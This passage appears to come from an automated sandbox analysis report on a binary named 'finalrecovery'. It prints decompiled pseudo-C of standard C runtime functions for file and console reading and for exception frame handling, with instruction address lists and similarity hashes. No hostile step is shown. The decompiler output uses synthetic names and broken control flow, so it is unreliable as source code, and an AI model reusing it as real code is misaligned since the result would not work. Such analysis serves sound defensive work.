						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E0041355E(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E00413571(__eflags))) = 0x16;
								E00413497();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0041ECAF(_t154);
								E0041E238(0);
								E0041E238(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0041D0D8(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x4508e0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00427E57(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0041353B(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00413571(__eflags))) = 9;
											 *(E0041355E(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E0041D26E();
												} else {
													_t170 = E0041D574();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E0041D41D(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t111 =  &_v16; // 0xa
									_t178 = ReadConsoleW(_v28, _v24,  *_t111 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00413571(__eflags))) = 0xc;
									 *(E0041355E(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E0041E238(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x4508e0 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E0041355E(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00413571(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E0041355E(_t246)) =  *_t197 & 0x00000000;
					_t139 = E00413571(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x0041d70c
0x0041d710
0x0041d713
0x0041d72d
0x0041d72f
0x0041da94
0x0041da94
0x0041da99
0x0041da99
0x0041daa1
0x0041daa7
0x0041daa7
0x00000000
0x0041daa7
0x0041d735
0x0041d73b
0x00000000
0x00000000
0x0041d745
0x0041d74b
0x0041d74e
0x0041d751
0x0041d75b
0x0041d75e
0x0041d761
0x0041d765
0x0041d767
0x00000000
0x00000000
0x0041d76d
0x0041d770
0x0041d776
0x0041d790
0x0041d792
0x0041da90
0x00000000
0x0041da90
0x0041d798
0x0041d79b
0x00000000
0x00000000
0x0041d7a1
0x0041d7a5
0x00000000
0x00000000
0x0041d7ab
0x0041d7ae
0x0041d7b2
0x0041d7b9
0x0041d7bb
0x0041d7bb
0x0041d7be
0x0041d813
0x0041d815
0x0041d7db
0x0041d7e0
0x0041d7e7
0x0041d7ed
0x00000000
0x0041d817
0x0041d819
0x0041d81a
0x0041d81c
0x0041d81f
0x0041d821
0x0041d823
0x0041d825
0x0041d825
0x0041d830
0x0041d832
0x0041d839
0x0041d83e
0x0041d841
0x0041d844
0x0041d846
0x0041d86a
0x0041d872
0x0041d875
0x0041d87c
0x0041d883
0x0041d887
0x0041d889
0x0041d88c
0x0041d893
0x0041d893
0x0041d896
0x0041d898
0x0041d89b
0x0041d8a0
0x0041d8a3
0x0041d8ac
0x0041d8b0
0x0041d8b3
0x0041d8b5
0x0041d8bb
0x0041d8bd
0x0041d8c6
0x0041d8c7
0x0041d8c9
0x0041d8cd
0x0041d8ce
0x0041d8d2
0x0041d8d5
0x0041d8df
0x0041d8e4
0x0041d8e7
0x0041d8f6
0x0041d8fa
0x0041d8fd
0x0041d8ff
0x0041d901
0x0041d903
0x0041d908
0x0041d90a
0x0041d90e
0x0041d90f
0x0041d915
0x0041d91f
0x0041d920
0x0041d923
0x0041d928
0x0041d92b
0x0041d93a
0x0041d93e
0x0041d941
0x0041d943
0x0041d945
0x0041d947
0x0041d949
0x0041d94f
0x0041d94f
0x0041d950
0x0041d95f
0x0041d962
0x0041d963
0x0041d963
0x0041d947
0x0041d943
0x0041d92b
0x0041d903
0x0041d8ff
0x0041d8e7
0x0041d8bd
0x0041d8b5
0x0041d969
0x0041d96f
0x0041d971
0x0041d9e4
0x0041d9e4
0x0041d9e8
0x0041d9f8
0x0041d9fe
0x0041da00
0x0041da5c
0x0041da5c
0x0041da64
0x0041da65
0x0041da67
0x0041da80
0x0041da83
0x0041d9c0
0x0041d9c1
0x00000000
0x0041d9c6
0x0041da89
0x00000000
0x0041da89
0x0041da6e
0x0041da79
0x00000000
0x0041da79
0x0041da02
0x0041da05
0x0041da08
0x00000000
0x00000000
0x0041da0a
0x0041da0a
0x0041da0d
0x0041da10
0x0041da13
0x0041da1a
0x0041da1f
0x0041da21
0x0041da25
0x0041da40
0x0041da44
0x0041da45
0x0041da48
0x0041da49
0x0041da55
0x0041da4b
0x0041da4b
0x0041da4b
0x0041da27
0x0041da27
0x0041da27
0x0041da32
0x0041da37
0x0041da3a
0x0041da3a
0x00000000
0x0041da1f
0x0041d976
0x0041d979
0x0041d980
0x0041d985
0x00000000
0x00000000
0x0041d98e
0x0041d994
0x0041d996
0x00000000
0x00000000
0x0041d998
0x0041d99c
0x00000000
0x00000000
0x0041d9a4
0x0041d9b0
0x0041d9b6
0x0041d9b8
0x0041d9dc
0x0041d9df
0x00000000
0x0041d9df
0x0041d9ba
0x00000000
0x0041d848
0x0041d84d
0x0041d858
0x0041d9c7
0x0041d9c7
0x0041d9c7
0x0041d9ca
0x0041d9cb
0x00000000
0x0041d9d3
0x0041d846
0x0041d815
0x0041d7c0
0x0041d7c3
0x0041d7d7
0x0041d7d9
0x0041d7fa
0x0041d7fd
0x0041d800
0x0041d803
0x00000000
0x0041d803
0x00000000
0x0041d7c5
0x0041d7c5
0x0041d7c8
0x0041d7cb
0x00000000
0x0041d7cb
0x0041d7c3
0x0041d778
0x0041d77d
0x0041d785
0x00000000
0x0041d715
0x0041d71a
0x0041d71d
0x0041d722
0x0041daac
0x00000000
0x0041daac

Strings

, xrefs: 0041D9A4, 0041D9A9

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 9983ef659ef28bb2c7742fc4bec09b411bf4c6f7b304ab43fc1bafd3bdf25fb9
Instruction ID: 9793297be83448982c1ca182a2ab524ea74c94322569a1b9c5e308745a7a317f
Opcode Fuzzy Hash: 9983ef659ef28bb2c7742fc4bec09b411bf4c6f7b304ab43fc1bafd3bdf25fb9
Instruction Fuzzy Hash: 45C103F4E04205AFDF15DF99C880BEEBBB1AF49344F04415AE415AB392C77899C1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412092 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00412092(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E0041312D(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E00419BC9(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_t203 = E00411D16(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E00411D16(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E0040FC08(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E0040FB3B(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00412012(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E00419BC9(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E00411D16(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E00411D16(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E00411D16(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E00411D16(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E0040FB3B(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00412012(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0040FF75(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E00411D16(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E00412AA1(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E00411D16(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E00411D16(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00411D16(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E00411D16(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E00412AA1(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E0041C68D(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E00412735( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x44fb08) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E0040FF75(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E0041271D( &_v64);
											E004103CB( &_v64, 0x43b934);
											L63:
											 *(E00411D16(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E00411D16(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E0040FD2E(_t279, _t319, _t274);
											E004129A1(_a8, _a16, _t305);
											_t235 = E00412B5E(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E00412918(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x00412092
0x00412099
0x0041209b
0x004120a4
0x004120aa
0x004120b2
0x004120b4
0x004120b7
0x004120bd
0x00412436
0x00412436
0x0041243b
0x0041243d
0x0041243f
0x00412442
0x00412443
0x00412446
0x0041244c
0x0041256b
0x00412452
0x00412454
0x0041245b
0x0041245e
0x00412461
0x00412467
0x00412469
0x0041246e
0x00412471
0x00412473
0x00412479
0x0041247b
0x00412481
0x00412496
0x0041249b
0x0041249e
0x004124a0
0x00412567
0x00000000
0x00412568
0x004124a0
0x00412481
0x00412479
0x00412471
0x004124a6
0x004124a9
0x004124ac
0x004124af
0x004124b2
0x004124b8
0x004124ca
0x004124cf
0x004124d2
0x004124d5
0x004124d8
0x004124db
0x004124de
0x004124e1
0x00000000
0x00000000
0x004124e7
0x004124e7
0x004124ea
0x004124ed
0x004124fc
0x004124fd
0x004124fd
0x004124ff
0x00412502
0x00000000
0x00000000
0x00412504
0x00412507
0x00000000
0x00000000
0x00412515
0x00412517
0x0041251a
0x0041251c
0x00412524
0x00412524
0x00412527
0x00412529
0x0041252b
0x00412547
0x0041254c
0x0041254f
0x0041254f
0x00000000
0x00412527
0x0041251e
0x00412522
0x00000000
0x00000000
0x00000000
0x00412552
0x00412555
0x00412556
0x00412559
0x0041255c
0x0041255f
0x00412562
0x00412562
0x00000000
0x004124ed
0x0041256c
0x00412571
0x00412572
0x00412575
0x00412578
0x00412579
0x0041257a
0x0041257b
0x0041257e
0x00412580
0x004125f8
0x004125fa
0x004125fa
0x00412582
0x00412582
0x00412585
0x00412588
0x00000000
0x0041258a
0x0041258a
0x0041258d
0x00412590
0x00412597
0x00412597
0x0041259a
0x0041259c
0x0041259e
0x004125d0
0x004125d0
0x004125d3
0x004125da
0x004125da
0x004125dd
0x004125e0
0x004125e7
0x004125e7
0x004125ea
0x004125f1
0x004125f3
0x004125f3
0x004125ec
0x004125ec
0x004125ef
0x00000000
0x00000000
0x004125ef
0x004125e2
0x004125e2
0x004125e5
0x00000000
0x00000000
0x004125e5
0x004125d5
0x004125d5
0x004125d8
0x00000000
0x00000000
0x004125d8
0x004125f4
0x004125a0
0x004125a0
0x004125a0
0x004125a3
0x004125a3
0x004125a5
0x004125a7
0x00000000
0x00000000
0x004125a9
0x004125ab
0x004125bf
0x004125bf
0x004125ad
0x004125ad
0x004125b0
0x004125b3
0x00000000
0x004125b5
0x004125b5
0x004125b8
0x004125bb
0x004125bd
0x00000000
0x00000000
0x00000000
0x00000000
0x004125bd
0x004125b3
0x004125c8
0x004125c8
0x004125ca
0x00000000
0x004125cc
0x004125cc
0x004125cc
0x00000000
0x004125ca
0x004125c3
0x004125c5
0x004125c5
0x00000000
0x004125c5
0x00412592
0x00412592
0x00412595
0x00000000
0x00000000
0x00000000
0x00000000
0x00412595
0x00412590
0x00412588
0x004125fb
0x004125ff
0x004125ff
0x004120cc
0x004120cc
0x004120d5
0x004121d2
0x004121d2
0x004121d5
0x00000000
0x00412104
0x00412104
0x00412109
0x00000000
0x0041210f
0x0041210f
0x00412117
0x004123d0
0x004123d4
0x0041211d
0x00412122
0x00412125
